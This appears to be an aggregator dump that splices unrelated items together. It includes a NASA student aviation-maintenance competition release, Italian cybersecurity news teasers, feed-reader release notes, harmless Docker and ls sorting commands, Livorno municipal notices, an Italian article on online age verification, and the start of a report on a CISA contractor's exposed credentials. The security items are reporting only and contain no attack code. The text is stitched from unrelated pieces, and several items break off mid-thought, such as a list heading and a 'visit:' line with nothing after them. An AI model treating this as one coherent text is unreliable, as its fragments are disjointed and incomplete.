Massive Christmas present by my italian friend Luca Franceschini of digitalmind. He merged his combo with my combined patch (2016.12.02 version) adding several (heavily customized) patches and functionalities. Luca is a C programmer and an expert system administrator who manages big servers.
A South Dakota State University team took first place at NASA’s fifth annual Gateways to Blue Skies Competition, which challenged student teams to address a critical element of U.S. aviation: aircraft maintenance.
This year’s competition, RepAir: Advancing Aircraft Maintenance, asked teams of postsecondary students to develop innovative systems and practices that could advance commercial aircraft maintenance and repair operations by 2035. The competition, sponsored by NASA’s University Innovation project within the agency’s Aeronautics Research Mission Directorate, supported the agency’s objectives of fostering innovative research and strengthening the future aviation workforce.
“This year’s finalists proposed novel ideas to equip companies and their workers with innovative technologies to help keep our nation’s planes airworthy. This is especially critical in a time where flight safety is more commonly in the spotlight and where workforce shortages lead to challenges and opportunities in aviation,” said Steven Holz, associate project manager for NASA’s University Innovation Project and judging panel chair for Gateways to Blue Skies. “Our panel of industry and subject matter experts were excited about the possibilities these concepts could bring, as well as shared insights needed for these teams to push forward for real-world implementation.”
The winning project, WINGMAN, proposed augmented reality safety glasses equipped with voice-controlled manuals, automatic documentation, and photo recognition that could assist aircraft mechanics during routine daily servicing and minor repairs. The glasses would function as the mechanic’s “wingman,” enabling hands-free access to the information and reporting mechanisms required for line inspections.
The WINGMAN team presented their research along with seven finalists at the 2026 Gateways to Blue Skies Forum held May 18 and 19 at NASA’s Langley Research Center in Hampton, Virginia. The forum was judged by subject matter experts from NASA, the Federal Aviation Administration, and industry, including representatives from Southwest Airlines and American Airlines. Students at the forum had the opportunity to network with NASA and industry experts, tour the center, and gain insight into potential careers. The event was livestreamed, and the presentations were recorded.
The winning team members will have the opportunity to intern at one of NASA’s four aeronautics research centers during the 2026-27 academic year, including NASA Langley, NASA’s Glenn Research Center in Cleveland, NASA’s Ames Research Center in California’s Silicon Valley, and NASA’s Armstrong Flight Research Center in Edwards, California.
“It was super exciting to participate in Gateways to Blue Skies, especially with the really interesting concepts this year,” said Owen Diede, WINGMAN team lead. “We couldn’t have done it without the feedback and support from our faculty advisor, Dr. Todd Letcher, as well as our design review committee, Dr. Ruyi Lian and Dr. Cody Christensen. This was a fantastic opportunity to learn and grow, and we are incredibly thankful for the experience.”
Other recognitions included:
The commercial aviation industry is a crucial component of the U.S. economy, yet it faces significant challenges due to a shortage of qualified maintenance workers and increasing demands to keep aircraft running for longer. NASA is dedicated to working with commercial, academic, and government partners to advance the capabilities and performance of U.S. aviation.
The Gateways to Blue Skies Challenge is part of the Transformative Aeronautics Concepts Program in NASA’s Aeronautics Research Mission Directorate. The NASA Tournament Lab, part of the Prizes, Challenges, and Crowdsourcing Program in the Space Technology Mission Directorate, manages the challenge through the National Institute of Aerospace on behalf of NASA.
For more information about NASA’s Aeronautics Research Mission Directorate, visit:
AI is giving Linus Torvalds a headache, but not in the way you might think.
Nonostante Internet Explorer sia ormai ufficialmente morto da tempo, uno dei suoi componenti storici continua a rappresentare un serio problema di sicurezza per gli ambienti Windows moderni. Si tratta di MSHTA.exe, il Microsoft HTML Application Host, una utility legacy ancora inclusa di default nel sistema operativo e oggi sempre più sfruttata dai cybercriminali per distribuire […]
L'articolo MSHTA, lo “zombie” di IE che alimenta attacchi su Windows proviene da Securityinfo.it.
This is bug-fix release for 1.29.0.
Feature highlights✨:
.txt import of feed URLs in additional to e.g. OPMLBug fixes highlights 🐛:
UI highlights 🖼:
This release has been made by @Alkarex, @Frenzie, @IEEE-754, @Inverle, @McFev, @ciro-mota, @cweiske, @polybjorn and newcomer @mzl2233
Full changelog:
lib_opml library #8652, #8853,
Un attacco informatico basato su una vulnerabilità sconosciuta nei router enterprise di Huawei avrebbe causato nel 2025 uno dei più gravi incidenti infrastrutturali europei degli ultimi anni, provocando il collasso temporaneo dell’intera rete telecom del Lussemburgo. Secondo quanto riportato da Recorded Future News, l’incidente avrebbe coinvolto un comportamento non documentato del sistema operativo di rete […]
L'articolo Attacco ai router Huawei dietro blackout telecom del Lussemburgo proviene da Securityinfo.it.
Files by age, newest first:
ls -lt
Docker images by age, newest first:
docker images --format "{{.CreatedAt}}\t{{.Repository}}:{{.Tag}}" | sort -r
Files by size, largest first:
ls -lS
Docker images by size, largest first:
docker images --format "{{.Size}}\t{{.Repository}}:{{.Tag}}" | sort -rh
Why why why??!
Alcune storie possono essere raccontate, più o meno fedelmente, ma la memoria può giocare brutti scherzi. Nel caso di Indymedia Italia, https://italy.indymedia.org, è invece possibile, se pure con alcuni limiti, verificare direttamente – anche a distanza di 20 e più anni – i contenuti di un sito attivo dal 2001 al 2006, quando sospese la sua attività a favore di altri siti, locali e regionali, fino alla progressiva chiusura.
Quella che trovate qui è una copia di archivio realizzata da noi nel 2021 in occasione del ventennale di Genova G8, quando fu allestita una installazione temporanea del sito.
La piattaforma ha utilizzato due diversi software: Catalyst CMS dal 2001 al 2003, e SF-Active dal 2003 al 2006. La versione conservata qui è la seconda, quella basata su SF-Active e quindi l’aspetto grafico delle pagine è diverso da quello visibile durante le giornate del luglio 2001. L’archivio è navigabile ma statico: fotografa lo stato del sito nel 2006 e ovviamente non consente modifiche o pubblicazione di nuovi contenuti.
Per la natura tecnologica di questo tipo di archivi questa è una copia incompleta, non sono archiviati e visitabili tutti i link verso risorse esterne e molte pagine o contenuti di esse potrebbero non essere visibili.
È disponibile un motore di ricerca, che permette di ricercare i testi delle pagine, e filtrare per data.
Ulteriormente stiamo curando una raccolta di pubblicazioni (libri, articoli di riviste, tesi, siti) che hanno indagato la storia, le pratiche e l’eredità politica di Indymedia.
Il nostro collettivo aveva partecipato attivamente al progetto Indymedia, contribuendo alla sua crescita. La nostra attitudine — mutuata dalle sottoculture hacker e fondata sui principi di condivisione, apertura, valorizzazione delle differenze e desiderio di sperimentare tecniche e linguaggi — aveva reso possibile un radicale esperimento collettivo di autogestione.
AAMPS conferma che in occasione della festività di venerdì 22 maggio prossimo il servizio di raccolta dei rifiuti si svolgerà regolarmente. È previsto solo un cambiamento negli itinerari di interesse per gli abitanti dell’area Livorno Est.
Ecco il dettaglio suddiviso per Aree valido per la raccolta nel giorno di Santa Giulia:
Area Livorno Nord
Il calendario ordinario non prevede il servizio di raccolta il venerdì.
Area Sant’Jacopo Marradi
Carta-cartone: servizio attivo la mattina (esposizione del materiale dalle ore 21.00 di giovedì alle 5.00 del giorno di raccolta).
Area Vittoria Stazione Zola
Indifferenziato: servizio attivo la mattina (esposizione del materiale dalle ore 21.00 di giovedì alle 5.00 del giorno di raccolta).
Area Livorno est
Organico: servizio anticipato alla mattina (valido solo per le utenze che espongono il materiale con il mastello dalle ore 21.00 di giovedì alle 5.00 del giorno di raccolta).
Area Picchianti – Porta a Terra
Il calendario ordinario non prevede il servizio di raccolta il venerdì.
Area Ardenza – La Rosa
Organico: servizio attivo la mattina (valido solo per le utenze che espongono il materiale con il mastello dalle ore 21.00 di giovedì alle 5.00 del giorno di raccolta).
Livorno Sud
Multimateriale: servizio attivo la mattina (esposizione del materiale dalle ore 21.00 di giovedì alle 5.00 del giorno di raccolta).
Area Pentagono
Carta-cartone: servizio attivo la sera (esposizione del materiale dalle ore 19.30 alle 20.00).
Tutti i contenitori stradali presenti nelle aree “Pentagono” e “Centro Allargato” saranno regolarmente vuotati.
Il Centro di raccolta “Livorno Sud” e il “Centro del riuso creativo” saranno chiusi venerdì e riapriranno il giorno seguente.
L'articolo Raccolta rifiuti: servizi attivi nella festività del 22 maggio proviene da Aamps Livorno.
I governi e la società civile di tutto il mondo sembrano avere un obiettivo comune: proteggere bambini e giovani dai pericoli della navigazione sul web, dall’uso non supervisionato dei social media, da contenuti pornografici, violenti o pericolosi. La virata globale verso un Internet dove è necessario verificare la propria età ha però una serie di criticità, legate alle soluzioni che si stanno adottando e ai problemi che esse pongono in termini di privacy e sorveglianza.
Alcune misure sono arrivate tramite leggi statali, come nel caso dell’Australia e del Regno Unito. Altre sono iniziative delle stesse piattaforme, come nel caso di Discord, che ha annunciato e poi ritirato una policy nota come teen by default (cioè che dà per scontato che tutti gli utenti siano minorenni). Nonostante il quadro frammentato, è chiaro che ci si stia spostando verso un modello di Internet in cui sarà sempre più spesso richiesto di identificarsi per dimostrare di essere adulti. Questo potrebbe radicalmente cambiare il modo in cui vivremo la rete in futuro.
Esistono diversi approcci tecnologici per verificare l’età di un utente nel momento in cui entra o si iscrive a una piattaforma. Il primo è la stima dell’età sulla base di dati biometrici. Un software analizza un video o un selfie, dando un’indicazione di un’età presumibile. Un altro metodo prevede il confronto automatico tra una foto scattata live e la foto di un documento ufficiale. I siti possono inoltre richiedere una verifica dei dati bancari, o una piccola transazione da una carta di credito, per verificare che la persona intestataria sia maggiorenne. I controlli possono essere effettuati anche tramite l’operatore della rete mobile, che certifica che il numero da cui si sta effettuando una connessione sia associato a una persona adulta.
I metodi biometrici e quelli che richiedono di caricare le foto dei documenti presentano però evidenti problemi di privacy, dal momento che richiedono agli utenti di condividere informazioni estremamente sensibili con aziende private.
Gli attivisti per i diritti digitali nutrono grande scetticismo nei confronti di queste soluzioni. Martin Sas e Jan Tobias Mühlberg, due ricercatori belga autori di un paper commissionato dai Verdi Europei, hanno scritto: “Questo requisito [di provare la propria età, ndr], oltre a costituire un’ingerenza nella privacy delle persone, può potenzialmente limitare la loro capacità di esprimersi liberamente e di interagire con gli altri, a meno che non forniscano i propri dati personali e siano in grado di completare una procedura di verifica dell’età”.
Secondo l’Electronic Frontier Foundation, gli obblighi di verifica dell’età comportano una serie di possibili discriminazioni nei confronti di alcune categorie di persone già marginalizzate. Chi per esempio non dispone di documenti governativi validi e riconosciuti, come è il caso di alcune persone migranti, potrebbe trovarsi tagliato fuori da una buona fetta di servizi online. Negli Stati Uniti, riporta l’EFF, anche tanti adulti, soprattutto neri e ispanici, non hanno a disposizione documenti aggiornati con il nome o l’indirizzo corretto. La stessa cosa vale per le persone che stanno intraprendendo percorsi di affermazione o transizione di genere, che hanno meno probabilità di avere documenti aggiornati o foto ufficiali che corrispondono ai loro tratti somatici.
L’analisi dell’EFF è incentrata sugli Stati Uniti, ma è indicativa di un problema più ampio: “Il 43% degli americani transgender non dispone di documenti d’identità che riflettano correttamente il nome o genere. Per loro, la verifica dell’età pone una scelta impossibile: fornire documenti con nomi precedenti e indicatori di genere errati, rischiando così di essere costretti a un coming out, oppure perdere del tutto l’accesso alle piattaforme online”. Il metodo del riconoscimento facciale espone invece ai consueti bias algoritmici: i sistemi di intelligenza artificiale sono testati e funzionano soprattutto su persone bianche, sono però meno efficaci in caso di minoranze razziali ed etniche (ma anche, per esempio, di persone con disabilità).
Esistono però alternative più solide dal punto di vista della privacy. In Germania, per esempio, è in vigore un sistema di identità digitale che permette lo scambio di informazioni tra il server di un sito e un microprocessore contenuto nella carta d’identità elettronica nazionale. Tramite una chiave crittografica, il microprocessore dimostra di appartenere a una eID (una carta d’identità elettronica) rilasciata dal governo tramite una chiave crittografica, condivisa con altre 9.999 eID. “Ciò significa che l’unica informazione che la piattaforma ottiene è che una persona su 10mila si è registrata” hanno scritto Marten Risius e Johannes Sedlmeir su The Conversation.
Successivamente, il servizio e il microprocessore si scambiano la data corrente e l’età minima richiesta, mentre il microprocessore invia la data di nascita dell’utente. A quel punto, l’autenticazione avviene esclusivamente sulla base di queste informazioni, senza che ulteriori dati siano condivisi con il sito web. Altri sistemi, come l’European Digital Identity Wallet (di cui parleremo più avanti) o il Google o Apple Wallet (che da qualche anno permettono di custodire documenti d’identità digitali sul telefono e di utilizzarli come prova dell’età), funzionano in modo leggermente diverso: non si basano su microprocessori integrati in carte fisiche, bensì su componenti hardware presenti nei telefoni cellulari.
Queste soluzioni si avvalgono di un sistema crittografico che comunica alla piattaforma che una persona è in possesso di un documento digitale che attesta la sua maggiore età, senza tuttavia rivelare ulteriori dettagli. Il principio tecnico sottostante a entrambi questi esempi è la selective disclosure. Sempre Risius e Sedlmeir concludono: “Com’è evidente, i sistemi di verifica dell’età possono essere progettati ponendo al centro il principio della non tracciabilità. Ciò significa che né l’autorità né la piattaforma possono monitorare le attività di un utente, pur essendo in grado di verificare con precisione l’età”.
Una delle leggi più solide tra quelle in vigore è l’Online Safety Act del Regno Unito, che di fatto obbliga le piattaforme, i siti pornografici e i grandi motori di ricerca a impedire ai minori l’accesso a contenuti dannosi. Questi comprendono anche l’istigazione al suicidio, all’autolesionismo e la celebrazione dei disordini alimentari. Le regole sono in vigore dal luglio 2025. “In qualità di autorità di regolamentazione, non valuteremo i singoli contenuti né chiederemo ai servizi online di rimuovere materiale legale” si legge sul sito dell’Ofcom, l’autorità delle comunicazioni britannica (l’equivalente della nostra AGCOM) “Il nostro ruolo non è quello di impedire agli adulti di accedere a materiale pornografico legale, ma a partire dal 25 luglio saranno necessari controlli più rigorosi e, cosa fondamentale, non sarà più sufficiente spuntare una casella per dichiarare di avere più di 18 anni”. La legge, è fondamentale specificarlo, non obbliga tutte le piattaforme a verificare in modo diretto l’età di un utente, ma solo quelle che pubblicano materiale pornografico. Tutti gli altri siti devono comunque sottostare all’obbligo generale di impedire che i minori vengano in contatto con contenuti non appropriati.
In Unione Europea molti paesi stanno considerando di adottare legislazioni per il controllo dell’età, che si concretizzano in particolare nel divieto per le persone al di sotto di un’età specifica di iscriversi e utilizzare piattaforme social. Nelle ultime settimane, la Grecia ha annunciato che dal 2027 proibirà l’accesso alle piattaforme social ai minori di 15 anni. In Germania il partito di governo ha dichiarato che proporrà un divieto per i minori di 14 anni. In Danimarca si è raggiunto un accordo politico per impedire l’accesso sotto i 15 anni. E poi c’è la Francia, dove all’inizio di aprile il Senato ha approvato un disegno di legge che prevede un sistema a due livelli: alcune piattaforme saranno del tutto proibite ai minori, mentre altre richiederanno l’approvazione di almeno un genitore per l’iscrizione. La legge deve ora tornare in discussione alla Camera, ma vale la pena segnalare come il presidente della Repubblica Emmanuel Macron sia un grande sostenitore del social media ban.
Nel resto del mondo il dibattito segue direttrici simili. In Australia una legge considerata “storica” ha imposto alle principali piattaforme social di impedire l’accesso ai minori di 16 anni a partire da dicembre 2025, con sanzioni anche milionarie. In Brasile una legge entrata in vigore lo scorso marzo fa sì che i minorenni possano iscriversi alle piattaforme social solo se il loro account è collegato a quello di un supervisore adulto.
La legge di riferimento in Europa è invece il Digital Services Act (DSA). Il DSA non impone esplicitamente la verifica dell’età come requisito per operare sul territorio dell’Unione. Per le piattaforme online con più di 45 milioni di utenti mensili (VLOP, acronimo di very large online platforms), la Commissione si aspetta però che vengano adottate misure concrete per mitigare i rischi sistemici, ovvero i rischi che gli ecosistemi online pongono al resto della società. La tutela dei minori assume quindi un ruolo di primo piano.
“La questione della competenza in materia di verifica dell’età nei servizi digitali si colloca in una zona di intersezione tra il diritto dell’Unione e le prerogative nazionali, e può essere compresa correttamente solo se si abbandona una logica dicotomica per adottare una prospettiva di competenza mista, nella quale, tuttavia, il ruolo operativo degli Stati membri resta oggi decisivo”, spiega a Guerre di Rete Giovanni Ziccardi, professore di Informatica Giuridica presso l’Università di Milano.
Il Digital Services Act adotta infatti un modello “risk based”, basato cioè sulla valutazione dei rischi, lasciando aperto un ventaglio di soluzioni adottabili. L’obbligo non è quello di adottare una soluzione unica, ma di dimostrare che il sistema scelto protegge effettivamente i minori dai rischi per la loro sicurezza e incolumità. “Questa impostazione, tuttavia, apre uno spazio normativo significativo per l’intervento degli Stati membri. In assenza di una armonizzazione piena a livello europeo, infatti, sono gli ordinamenti nazionali a mantenere la competenza sulle modalità concrete attraverso cui tale obiettivo deve essere perseguito. Ciò riguarda, in primo luogo, la definizione delle tecniche di verifica dell’età – che possono spaziare da sistemi documentali a soluzioni basate su intermediari certificati o su modelli di anonimizzazione – e, in secondo luogo, la determinazione dei limiti di accesso a determinati contenuti, soprattutto quando si tratta di materiali sensibili come quelli pornografici”, prosegue Ziccardi.
Le autorità europee hanno recentemente fatto alcuni passi per attuare nel concreto le indicazioni del DSA. Dopo un’investigazione, terminata lo scorso marzo, è stato concluso che quattro siti pornografici (PornHub, Stripchat, XNXX e XVideos) non stanno mettendo in atto le protezioni sufficienti per evitare che i minorenni entrino in contatto con i loro contenuti (che sono, ovviamente, a sfondo sessuale). “La Commissione ha constatato, in via preliminare, che Pornhub, Stripchat, XNXX e XVideos non hanno adottato misure efficaci per impedire ai minori di accedere ai propri servizi, venendo così meno al proprio dovere di tutelare i diritti e il benessere dei minori. Sebbene nei loro Termini di servizio sia specificato che i servizi sono riservati esclusivamente agli adulti, tutte e quattro le piattaforme consentono ai minori di accedervi con un semplice clic, con cui confermano di avere più di 18 anni”, si legge nel comunicato stampa ufficiale. Un clic per confermare l’età non può più bastare. Se le conclusioni della Commissione dovessero essere confermate, le società rischiano sanzioni fino al 6% del loro fatturato annuo globale.
“Accanto alla dimensione dell’enforcement si sviluppa, in parallelo, una seconda direttrice di natura tecnico-infrastrutturale, che riguarda la costruzione di standard europei comuni. L’Unione sta infatti lavorando alla definizione di soluzioni interoperabili di verifica dell’età, anche attraverso progetti pilota basati su applicazioni dedicate e, soprattutto, in prospettiva, mediante l’integrazione con il EU Digital Identity Wallet. L’obiettivo è duplice: da un lato, evitare la frammentazione derivante dalla proliferazione di modelli nazionali eterogenei; dall’altro, garantire che i sistemi adottati rispettino principi fondamentali, come la protezione dei dati personali e la minimizzazione delle informazioni trattate”, prosegue Ziccardi.
Il regolamento quadro che introduce l’EU Digital Identity Wallet è entrato in vigore nel maggio del 2024 e gli stati membri saranno obbligati ad adottare la tecnologia entro la fine del 2026. “In questo contesto, assume particolare rilievo il paradigma della privacy by design, che si traduce nella ricerca di soluzioni capaci di attestare un requisito (per esempio, il superamento di una soglia di età) senza rivelare l’identità dell’utente”, prosegue Ziccardi. “Alcuni modelli già sperimentati, come quello della cosiddetta ‘doppia anonimizzazione’, prevedono la separazione tra il soggetto che verifica l’età e il servizio che eroga il contenuto, in modo da evitare la concentrazione di informazioni sensibili in un unico punto del sistema. Si tratta di un terreno nel quale diritto e tecnologia si influenzano reciprocamente: le esigenze di tutela giuridica orientano le soluzioni tecniche, mentre queste ultime ridefiniscono le possibilità concrete di regolazione”. La soluzione proposta dall’Europa si inserisce nel filone delle soluzioni privacy first e decentralizzate, che potrebbero costituire una modalità sicura e rispettosa della riservatezza per verificare l’età.
Nel 2025, l’AGCOM ha imposto ai siti per adulti di controllare che gli utenti siano maggiorenni. L’applicazione della direttiva è stata frammentata e ben presto il TAR del Lazio ha messo un freno alle disposizioni. Il problema principale risiede nella natura transfrontaliera dei servizi digitali. “Una parte significativa dei siti interessati, infatti, è stabilita in altri Stati membri dell’Unione, con la conseguente applicazione del principio del paese d’origine, che costituisce uno degli assi portanti del Digital Services Act. Questo principio limita fortemente la possibilità per un’autorità nazionale di imporre direttamente obblighi a operatori stabiliti altrove, imponendo invece il ricorso a meccanismi di cooperazione tra autorità competenti” spiega Giovanni Ziccardi. Il caso italiano rappresenta bene la frizione che può crearsi in un contesto di governance a più livelli (statale e sovranazionale).
Rimane uno scarto tra le questioni tecniche e la realtà sociale del problema. Le soluzioni come l’identità digitale europea o il Google Wallet sono create per limitare la quantità di informazioni che il sito può raccogliere sull’utente. Ma non prendono in considerazione lo scenario più banale: quello di un minore che utilizza il telefono, le credenziali o il documento di un adulto. In altre parole, il sistema può anche contribuire a non esporre una quantità significativa di dati personali, ma non elimina del tutto il rischio di un raggiro.
Lo scorso aprile, l’esperto di cybersicurezza Paul Moore ha affermato di essere riuscito a bypassare la crittografia del portafoglio digitale europeo in soli due minuti. Altri esperti hanno fatto eco a queste preoccupazioni: “Più dati raccolgono questi sistemi, più diventano appetibili per gli hacker”, ha dichiarato Hanna Bözakov, fondatrice del servizio di crittografia Tuta. Se si guarda infine al mercato delle VPN, si nota come siano diventate molto popolari nei contesti in cui si è introdotto l’obbligo di verifica dell’età.
Le direttrici di rischio sono diverse. Oltre ai dubbi tecnici, emergono anche alcune questioni politiche e culturali sulla natura della rete. Molti sostengono, per esempio, che d’ora in poi sarà impossibile navigare sul web in modo anonimo. C’è anche chi ritiene che gli obblighi tecnici e legali di verifica siano un modo per sollevare le Big Tech dalle proprie responsabilità rispetto alla moderazione dei contenuti. Tra quest’ultimi c’è Eva Simon, direttrice del programma su Tecnologia e Diritti della Civil Liberties Union in Europa: “Ci stiamo concentrando sull’accesso, ma il vero problema è il modo in cui le piattaforme catturano l’attenzione e promuovono i contenuti. È da lì che derivano i danni”.
Ma la verifica dell’età è ormai un orizzonte concreto, in Europa e nel mondo. “In questa cornice, la chiave interpretativa più convincente è forse quella che coglie una tensione tra forma e sostanza”, conclude Ziccardi. “L’obbligo di verifica dell’età non è ancora formalizzato in modo uniforme a livello europeo, ma si sta progressivamente imponendo come necessità sistemica. Il DSA richiede una protezione effettiva dei minori e, allo stato delle tecnologie e dei modelli organizzativi disponibili, la verifica dell’età rappresenta lo strumento più credibile per realizzarla. La questione centrale non riguarda più, dunque, la presenza o meno dell’obbligo, ma il modo in cui lo si impone: chi è legittimato a imporlo, attraverso quali strumenti tecnici deve essere attuato e, soprattutto, con quali garanzie in termini di tutela dei diritti fondamentali e della riservatezza degli utenti”.
L'articolo Il labirinto della verifica dell’età proviene da Guerre di Rete.
Lunedì 18 lo sciopero delle lavoratrici e dei lavoratori degli asili nido ha registrato un’adesione altissima, portando alla chiusura di numerosi nidi e dimostrando con forza quanto fossero reali le criticità denunciate sul nuovo bando.
La mobilitazione e la pressione esercitata in questi giorni hanno prodotto oggi, nell’incontro in Comune a Pisa, un primo risultato concreto: è stata formalizzata un’integrazione al bando che chiarisce finalmente il monte ore del servizio. Si passa ufficialmente da 241 ore + 8% a 260 ore + 8% di lavoro non frontale, riconoscendo una parte essenziale del lavoro educativo troppo spesso invisibilizzata e lasciata nell’incertezza.
Un primo risultato importante, conquistato grazie alla lotta collettiva di lavoratrici e lavoratori. Ma la mobilitazione non finisce qui: continueremo a lottare per risolvere le criticità ancora presenti nel lavoro pubblico esternalizzato e per garantire diritti, dignità del lavoro e qualità dei servizi pubblici.
Unione Sindacale di Base Federazione di Pisa
Professional fulfillment tops the list, according to LPI report.
Comunicato a cura dell’uff. Stampa del Comune di Livorno.
Livorno, 19 maggio 2026 – Da domani, mercoledì 20 maggio, sarà in vigore a Livorno l’ordinanza che obbliga i proprietari e i detentori di cani a rimuovere con acqua le deiezioni liquide degli animali nelle aree pubbliche e di uso pubblico.
L’ordinanza, della quale ha parlato la stampa italiana e straniera, avrà una durata di cinque mesi e terminerà il 31 ottobre in vista poi di introdurre questo provvedimento all’interno di regolamento comunale che estenderà l’obbligo a tutto l’anno.
In pratica sarà obbligo munirsi di appositi contenitori d’acqua da utilizzare per l’immediata rimozione delle deiezioni liquide depositate su superfici pavimentate e su altri spazi di arredo urbano, e sui mezzi di locomozione (ad esempio ruote di macchine o di scooter) parcheggiati sulla pubblica via.
È inoltre fatto assoluto divieto di consentire ai cani di urinare a ridosso di portoni e vetrine ed accessi ad abitazioni, uffici e negozi.
Lo ha stabilito appunto l’Amministrazione comunale con l’ordinanza sindacale n. 135 del 28 aprile 2026, emanata a seguito delle numerose segnalazioni pervenute da parte di cittadini che evidenziano il disagio determinato dalle maleodoranze e gli inconvenienti igienico-sanitari derivanti dalla presenza di deiezioni liquide animali sugli spazi destinati alla socializzazione di adulti e bambini, visto anche il notevole e crescente numero di animali d’affezione, in particolare cani, presenti sul territorio comunale.
Il provvedimento è stato al centro di una conferenza stampa alla quale hanno partecipato: la vicesindaca con delega alla Tutela Animali Libera Camici, l’assessora con Delega al Decoro Urbano Giovanna Cepparello, la garante degli animali Elisa Amato, la dirigente del Settore Manutenzioni e Cura della Città Silvia Borgo, la dirigente settore Istruzione, Giovani, Partecipazione e Tutela Animale Michela Casarosa, la responsabile dei Servizi Territoriali della Polizia Municipale Michela Pedini, la funzionaria Barbara Saliva, il responsabile del Decoro Urbano di Aamps/Retiambiente Andrea Valenti, la guardia zoofila dell’Oipa Giuliano Morelli.
Per quanto riguarda le deiezioni solide, gli articoli 31 e 32 del vigente Regolamento Comunale sulla Tutela degli Animali (la cui ultima modifica risale al 2018) prescrivono l’obbligo di rimuoverle immediatamente a chi accompagna i cani nelle zone pedonali e nelle aree verdi, comprese quelle di libera circolazione dei cani, nei giardini e nei parchi, negli esercizi pubblici, commerciali e nei locali ed uffici aperti al pubblico, utilizzando mezzi idonei alla rimozione, da mostrare su richiesta del Pubblico Ufficiale, a pena di sanzione secondo quanto previsto dall’art. 42 dello stesso Regolamento.
Il Regolamento attuale non prevede però analoga norma per quanto attiene alle deiezioni liquide.
Nelle more di una modifica alla regolamentazione comunale vigente, l’ordinanza 135/2026 adotta misure atte a prevenire e contenere tali fenomeni, per tutto il periodo più critico dal punto di vista climatico. Il significativo aumento delle temperature che si verifica in primavera-estate, associato a una diminuzione delle precipitazioni, incide infatti anche sulla salubrità e sul decoro degli spazi urbani, anche in conseguenza della maggiore evaporazione di liquidi organici dalle superfici pavimentate.
Nello specifico, il testo integrale dell’ordinanza n. 135 impone, dal 20 maggio al 31 ottobre, a tutti i possessori o detentori a qualsiasi titolo di cani, anche se incaricati temporaneamente della loro custodia o conduzione:
• di munirsi, durante l’accompagnamento dei cani, di apposite bottigliette, spruzzatori o altri contenitori d’acqua, senza aggiunta di sostanze chimiche o detergenti, da versare all’occorrenza;
• di riversare una congrua quantità di acqua in corrispondenza del punto interessato dalle deiezioni liquide dei cani ai fini della loro diluizione e della ripulitura delle superfici interessate, su tutte le aree urbane pubbliche o ad uso pubblico e relativi manufatti e sulle aree private che si affacciano su aree pubbliche o ad uso pubblico, nonché sui mezzi di locomozione parcheggiati sulla pubblica via;
• è fatto divieto assoluto di consentire ai cani di urinare a ridosso dei portoni di ingresso e degli accessi ad abitazioni, uffici e negozi e vetrine.
L’inosservanza di queste disposizioni comporta l’applicazione di una sanzione amministrativa pecuniaria da 25 a 500 euro, ai sensi dell’art. 7-bis del D. Lgs. 267/2000.
Rimane comunque a carico del trasgressore il ripristino dei luoghi.
Gli interventi
La Vicesindaca ha introdotto l’ordinanza sottolineando la sua grande risonanza mediatica, anche a livello internazionale.
“Lo scopo principale non è punitivo, ma mira a elevare lo standard di igiene e decoro delle strade, dei marciapiedi e degli arredi urbani. Livorno conta circa 20.000 cani, un numero consistente che richiede responsabilità da parte dei proprietari per garantire una convivenza civile. La mancanza di rispetto delle regole da parte di una minoranza danneggia il lavoro degli operatori, dei proprietari responsabili e limita la fruibilità degli spazi pubblici, come i parchi, specialmente per i bambini”.
La Vicesindaca ha inoltre ricordato che l’Amministrazione ha rimosso i divieti di accesso ai cani in molti parchi per favorire le famiglie, ma avverte che, “se le segnalazioni di sporcizia e cani senza guinzaglio continueranno, potrebbero essere reintrodotte limitazioni”.
Ha inoltre ricordato il protocollo d’intesa con le guardie zoofile dell’OIPA, che hanno il potere di elevare sanzioni insieme alla Polizia Locale.
L’Assessora Cepparello ha parlato degli aspetti pratici e sociali del provvedimento sottolineando come l’ordinanza nasca anche per tutelare le persone con disabilità motoria, che spesso sporcano i propri ausili (sedie a rotelle) sui marciapiedi non puliti, portando poi lo sporco in casa. “I proprietari dei cani devono munirsi di bottigliette o spruzzatori con semplice acqua (senza sapone) da usare sui punti interessati dalle deiezioni liquide”. Ha ricordato il divieto assoluto di far urinare i cani ridosso di portoni, accessi ad abitazioni. “Si è optato per un’ordinanza, per agire tempestivamente prima dell’estate, quando il calore accentua i cattivi odori. L’ordinanza prevede una scadenza, ma recepiremo questo provvedimento all’interno di un regolamento in modo che l’obbligo delle bottigliette diventi permanente in tutte le stagioni e i mesi dell’anno. Il Comune non può lavare quotidianamente centinaia di chilometri di strade e la collaborazione dei cittadini è strategica”.
La Garante degli Animali ha posto l’accento sulla salute pubblica e sulla sicurezza nei parchi. Ha evidenziato che le deiezioni non raccolte contengono batteri e parassiti pericolosi per gli animali e soprattutto per i bambini che giocano nei prati. Ha citato situazioni di particolare degrado riscontrate nella zona di San Jacopo e vicino alla Baracchina Bianca, “dove i muri sono sporchi e i marciapiedi pieni di deiezioni solide”. Ha richiamato l’obbligo del guinzaglio nei luoghi pubblici, denunciando episodi di maleducazione subiti quando ha cercato di far rispettare questa norma. Infine ha esortato i cittadini a un maggiore rispetto per l’ambiente e per la città, sottolineando che il decoro urbano è un dovere di ogni proprietario.
Andrea Valenti, responsabile Decoro Urbano AAMPS/Retiambiente ha affermato: “Aamps si muove su due versanti: pulizia e sensibilizzazione al cittadino. In entrambi i casi abbiamo favorito un potenziamento dei servizi, pertanto forniamo un contributo determinante alla cura della città anche per contrastare il fenomeno dell’abbandono delle deiezioni canine. Siamo anche prossimi all’acquisto di 100 contenitori dedicati che avranno una bocca di ingresso dei sacchini molto piccola e, pertanto, non potranno essere utilizzati impropriamente per l’inserimento di sacchi invece destinati alla raccolta dei rifiuti. Nel mese di giugno provvederemo all’installazione presso le aree di sgambatura dei cani, i parchi pubblici e nelle zone che, dalle segnalazioni pervenute, risultano più soggetto a questa tipologia di abbandono”.
L'articolo Deiezioni liquide: da domani obbligo di rimuoverle proviene da Aamps Livorno.
Until this past weekend, a contractor for the Cybersecurity & Infrastructure Security Agency (CISA) maintained a public GitHub repository that exposed credentials to several highly privileged AWS GovCloud accounts and a large number of internal CISA systems. Security experts said the public archive included files detailing how CISA builds, tests and deploys software internally, and that it represents one of the most egregious government data leaks in recent history.
On May 15, KrebsOnSecurity heard from Guillaume Valadon, a researcher with the security firm GitGuardian. Valadon’s company constantly scans public code repositories at GitHub and elsewhere for exposed secrets, automatically alerting the offending accounts of any apparent sensitive data exposures. Valadon said he reached out because the owner in this case wasn’t responding and the information exposed was highly sensitive.
A redacted screenshot of the now-defunct “Private CISA” repository maintained by a CISA contractor.
